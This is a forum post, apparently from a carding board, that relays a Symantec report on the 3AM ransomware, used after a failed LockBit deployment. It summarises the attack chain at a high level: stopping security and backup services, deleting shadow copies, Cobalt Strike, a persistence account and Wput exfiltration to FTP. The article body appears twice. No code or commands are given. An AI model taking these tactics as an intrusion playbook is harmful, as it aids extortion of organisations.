Carding
Professional
- Messages
- 2,871
- Reaction score
- 2,331
- Points
- 113
After failing to install the LockBit ransomware, the hacker deployed 3AM, which attracted researchers.
Symantec specialists described a new family of ransomware called 3AM, discovered in a single incident in which an unidentified hacker deployed the strain after an unsuccessful attempt to install the LockBit ransomware on the target network.
The Symantec Threat Hunter Team says that 3AM is written in Rust and represents a completely new family of malware. The ransomware attempts to stop several services on the infected computer before it starts encrypting files. After encryption is complete, 3AM deletes Volume Shadow Copies( VSS).
The 3AM ransomware got its name from the fact that it is mentioned in the ransom note, there is a post about it on Reddit . 3AM also adds encrypted files with the extension". threeamtime". Currently, it is not known whether the malware authors have any connections with known groups.
It is reported that during the detected attack, the attacker managed to install the ransomware program on three machines in the organization's network, but it was blocked on two of these machines.
The cybercriminals then used Cobalt Strike for subsequent exploitation and privilege escalation, as well as for intelligence purposes to identify other servers for further movement. The exact penetration route used in the attack is unclear.
In addition, the hackers added a new user for resilience and used the Wput tool to transfer victims ' files to their own FTP server.
The 64-bit 3AM executable file, written in Rust, is designed to run a series of commands to stop various software related to security and backup, as well as to encrypt files that meet pre-defined criteria.
Although the exact origin of the ransomware remains unknown, according to a post on Reddit, there is evidence that the 3AM strain associated with the detected campaign is attacking several other organizations.
Symantec noted that new families of ransomware appear frequently, and most of them disappear just as quickly, or they never manage to gain significant popularity. However, the fact that 3AM was used as a fallback by a LockBit partner suggests that it may be of interest to attackers and may be seen again in the future.
Symantec specialists described a new family of ransomware called 3AM, discovered in a single incident in which an unidentified hacker deployed the strain after an unsuccessful attempt to install the LockBit ransomware on the target network.
The Symantec Threat Hunter Team says that 3AM is written in Rust and represents a completely new family of malware. The ransomware attempts to stop several services on the infected computer before it starts encrypting files. After encryption is complete, 3AM deletes Volume Shadow Copies( VSS).
The 3AM ransomware got its name from the fact that it is mentioned in the ransom note, there is a post about it on Reddit . 3AM also adds encrypted files with the extension". threeamtime". Currently, it is not known whether the malware authors have any connections with known groups.
It is reported that during the detected attack, the attacker managed to install the ransomware program on three machines in the organization's network, but it was blocked on two of these machines.
The cybercriminals then used Cobalt Strike for subsequent exploitation and privilege escalation, as well as for intelligence purposes to identify other servers for further movement. The exact penetration route used in the attack is unclear.
In addition, the hackers added a new user for resilience and used the Wput tool to transfer victims ' files to their own FTP server.
The 64-bit 3AM executable file, written in Rust, is designed to run a series of commands to stop various software related to security and backup, as well as to encrypt files that meet pre-defined criteria.
Although the exact origin of the ransomware remains unknown, according to a post on Reddit, there is evidence that the 3AM strain associated with the detected campaign is attacking several other organizations.
Symantec noted that new families of ransomware appear frequently, and most of them disappear just as quickly, or they never manage to gain significant popularity. However, the fact that 3AM was used as a fallback by a LockBit partner suggests that it may be of interest to attackers and may be seen again in the future.
